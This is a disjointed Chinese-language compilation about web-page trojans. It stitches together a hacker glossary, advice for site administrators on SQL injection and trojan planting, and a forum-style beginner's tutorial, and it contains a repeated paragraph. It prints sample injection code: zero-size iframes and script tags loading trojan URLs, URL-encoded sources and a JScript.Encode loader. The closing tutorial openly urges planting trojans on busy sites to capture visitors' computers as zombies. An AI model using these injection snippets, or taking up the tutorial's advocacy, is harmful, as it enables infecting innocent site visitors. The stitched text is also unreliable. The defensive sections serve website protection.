网页挂马种类

HTTPS那些协议：TLS,SSL,SNI,ALPN,NPN1、肉鸡：所谓“肉鸡”是一种很形象的比喻，比喻那些可以随意被我们控制的电脑，对方可以是WINDOWS系统，也可以是UNIX/LINUX系统，可以是普通的个人电脑，也可以是大型的服务器，我们可以象操作自己的电脑那样来操作它们，而不被对方所发觉。

2、木马：就是那些表面上伪装成了正常的程序，但是当这些被程序运行时，就会获取系统的整个控制权限。

有很多黑客就是热中与使用木马程序来控制别人的电脑，比如灰鸽子，黑洞，PcShare等等。

3.网页木马：表面上伪装成普通的网页文件或是将而已的代码直接插入到正常的网页文件中，当有人访问时，网页木马就会利用对方系统或者浏览器的漏洞自动将配置好的木马的服务端下载到访问者的电脑上来自动执行。

4、挂马：就是在别人的网站文件里面放入网页木马或者是将代码潜入到对方正常的网页文件里，以使浏览者中马。

5、后门：这是一种形象的比喻，入侵者在利用某些方法成功的控制了目标主机后，可以在对方的系统中植入特定的程序，或者是修改某些设置。

这些改动表面上是很难被察觉的，但是入侵者却可以使用相应的程序或者方法来轻易的与这台电脑建立连接，重新控制这台电脑，就好象是入侵者偷偷的配了一把主人房间的要是，可以随时进出而不被主人发现一样。

通常大多数的特洛伊木马(Trojan Horse)程序都可以被入侵者用语制作后门(BackDoor)6、rootkit：rootkit是攻击者用来隐藏自己的行踪和保留root(根权限，可以理解成WINDO WS下的system或者管理员权限)访问权限的工具。

通常，攻击者通过远程攻击的方式获得root访问权限，或者是先使用密码猜解(破解)的方式获得对系统的普通访问权限，进入系统后，再通过，对方系统内存在的安全漏洞获得系统的root权限。

然后，攻击者就会在对方的系统中安装rootkit，以达到自己长久控制对方的目的，r ootkit与我们前边提到的木马和后门很类似，但远比它们要隐蔽，黑客守卫者就是很典型的rootkit，还有国内的ntroorkit等都是不错的rootkit工具。

国内外黑客组织或者个人为牟取利益窃取和篡改网络信息，已成为不争的事实，在不断给单位和个人造成经济损失的同时，我们也应该注意到这些威胁大多是基于Web网站发起的攻击，在给我们造成不可挽回的损失前，我们有必要给大家介绍几种常见的网站漏洞，以及这些漏洞的防范方法，目的是帮助广大网站管理者理清安全防范思绪，找到当前的防范重点，最大程度地避免或减少威胁带来的损失。

1、SQL语句漏洞也就是SQL注入，就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令，比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击。

有效防范手段：对于SQL注入问题的一般处理方法是账户最小权限原则。

以下几种方法推荐使用：对用户输入信息进行必要检查对一些特殊字符进行转换或者过滤使用强数据类型限制用户输入的长度需要注意：这些检查要放在server运行，client提交的任何东西都是不可信的。

使用存储过程，如果一定要使用SQL语句，那么请用标准的方式组建SQL 语句。

比如可以利用parameters对象，避免用字符串直接拼SQL命令。

当SQL 运行出错时，不要把数据库返回的错误信息全部显示给用户，错误信息经常会透露一些数据库设计的细节。

2、网站挂马挂马就是在别人电脑里面(或是网站服务器)里植入木马程序，以盗取一些信息或者控制被挂马的电脑做一些不法的勾当(如攻击网站，传播病毒，删除资料等)。

网页挂马就是在网页的源代码中加入一些代码，利用漏洞实现自动下载木马到机器里。

网站挂马的形式可分为框架挂马、数据库挂马、后台挂马、服务器挂马以及其他形式的挂马方式。

有效防范手段：要防止网站被挂马，可以采取禁止写入和目录禁止执行的功能，这两项功能相组合，就可以有效地防止 ASP木马。

此外，网站管理员通过FTP上传某些数据，维护网页时，尽量不安装asp的上传程序。

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码（通常是通过IFrame、Script引用来实现），当用户访问该网页时，嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件（如Flash、PDF插件等）漏洞，在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL，比如下面的挂马代码：<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0，使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外，还有如下几种：1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS（层叠样式表）里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下：1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中，如果网站页面使用到这些字段的值，并且没做适当的过滤，就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下，攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗，并将挂马代码注入到用户请求的响应页面上，从而达到隐蔽的挂马目的。

网页挂马之实战详解不论是那一种帮凶，黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下，顺利将木马保存到被黑电脑中然后运行，经过多年的演变与发展，目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页)，当被黑者浏览这个网页，就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞，此方法当然就无效)。

一般而言黑客想要利用漏洞来进行黑客任务，几乎都必须自己写工具程序才行，不过在黑客的世界中永远有奉献出自己心力的慈善家，因此网络上就有一些针对某些漏洞而设计的木马生成器，让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务，在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。

由于这类工具是帮助真正的木马植入被黑电脑中与运行，因此应该称为木马帮凶，而不是真正的木马，因此严格来说它应该是木马帮凶生成器，而不是木马生成器，像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。

◎木马帮凶生成器的问题与盲区可能有读者会认为：既然有现成的工具，那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆，的确没错，虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地)，但是有经验黑客并不会因此而高兴，因为这些木马帮凶生成器的问题很多，并非找到后下载就能顺利使用，主要有下列问题：．虽然在查找网站中有找到，但单击后该网页已经不见了，当然也就不可能下载木马帮凶生成器，这种情况很常见，只好再试下一个查找到的项目。

．有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的，就算下载后可以正常使用，但对于已修补该漏洞的电脑当然就无效，也就是说年代愈久，木马生成器愈没有利用的价值 (对许多电脑可能都无效)，因此这类木马查找到一大堆也几乎是废物。

网页挂马调查报告网页被挂马是最让站长头痛的一件事情，因为这说明已经有骇客拥有了你的网站的操作权限，面对这种情况，首先如果是虚拟主机用户应当积极与服务商联系运行查杀工具，彻底清除恶意代码和后门；而如果你拥有自己的主机，则应当积极检查程序是否有漏洞并立即升级到最新的补丁。

所以作为站长就应当最早的发现网页被挂马的代码，下面是一些比较常见的挂马方式：常见挂马方式这种挂马方式比较多，主要是以下这种格式：“<iframe src=木马地址 width=0 height=0></iframe>”，width=0和height=0是为了隐藏框架。

与Iframe挂马平级，也比较常见，主要是以下这种格式："<script src=木马地址></script>"，当然也可以演变为Iframe挂马，"<script>document.write('<iframe src=木马地址 width=0 height=0></iframe>')</script>"。

附上一张石头博客被Script挂马的截图只要是JS文件，都可以通过被恶意修改从而被挂上恶意代码，一般被全站引用的JS代码最容易被挂木马，检测我们可以查看JS代码的左边或下边，坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏，所以要多看看JS代码页面有没有被故意拉长等。

这种挂马方式与Script挂马差不多，惟一不同的就是使用了Encode隐藏了源JS的后缀，但同样可以达到执行代码的目的，主要是以下这种格式：“<script language='JScript.Encode' src=/a.txt></script>”虽然表面上看只是引用了一个txt文件，但是依然可以顺利执行其中的代码。

首先说什么是网马。

网马有什么用呢？先说下有什么用。

例如，大家想玩鸽子，想找肉鸡。

想找很多很多的肉鸡。

当然方法很多，例如135抓鸡什么的。

但是我想大家都遇到一个问题，看人家教程上，抓鸡一下子就来了一串 ...首先说什么是网马。

网马有什么用呢？先说下有什么用。

例如，大家想玩鸽子，想找肉鸡。

想找很多很多的肉鸡。

当然方法很多，例如135抓鸡什么的。

但是我想大家都遇到一个问题，看人家教程上，抓鸡一下子就来了一串一串的。

我自己操作为啥老半天就扫不到呢？因为这漏洞出来很久了，再者，天天有人扫肉鸡。

当然肉鸡就少了，也很难找到。

还有，大家扫描肉鸡的方法可能也有点不对。

综合起来，利用这些漏洞找肉鸡的效率很低下。

那么用网马呢，网马就是挂马。

你想下。

要是一个网站，一天有1万个人访问，一万个人中哪怕几率降低到%1的中马率。

一天也有100个人中马成为你的肉鸡啊。

而且，你挂上网马后关机睡觉肉鸡也刷刷刷的上来。

所以网马很爽，所以也比自己拿个软件扫描漏洞来劲。

上面说了网马的作用。

综合叙述下，就是快捷，方便。

更快，更高，更强的达到散播木马的途径。

然后，大家应该明什么是网马了吧？对的，网马简单的说下，就是网页木马。

当别人访问一个网页就可能从这个网页自动下载木马，并且在你后台悄悄运行。

这就是网马。

简单的这么理解，当然我们学黑客知识的肯定对这些东西不能简单理解了事了。

但是，我们只是入门的小菜鸟，所以再深入了解一点点就行了。

深入说下。

什么是网马？网马就是利用网页代码操作win的漏洞。

首先，我们得明白什么是网页。

为什么我们打开一个网站，这个网站会显示出这些图片。

就如你现在看的这篇帖子，为什么背景是这个颜色，为什么字体有大有小，为什么网页各处的颜色不同。

然后构成了这样一个网页。

怎么构成的？难道就是简简单单的几张图片就构成了我们现在看到的这个网页页面？错了。

是图片+文字+代码。

这是一个网页构成的基本元素。

但是，代码是必须要的。

这里提到了代码。

例如一段网页由设计者设计，图片应该放这里，文字应该按照这样排列。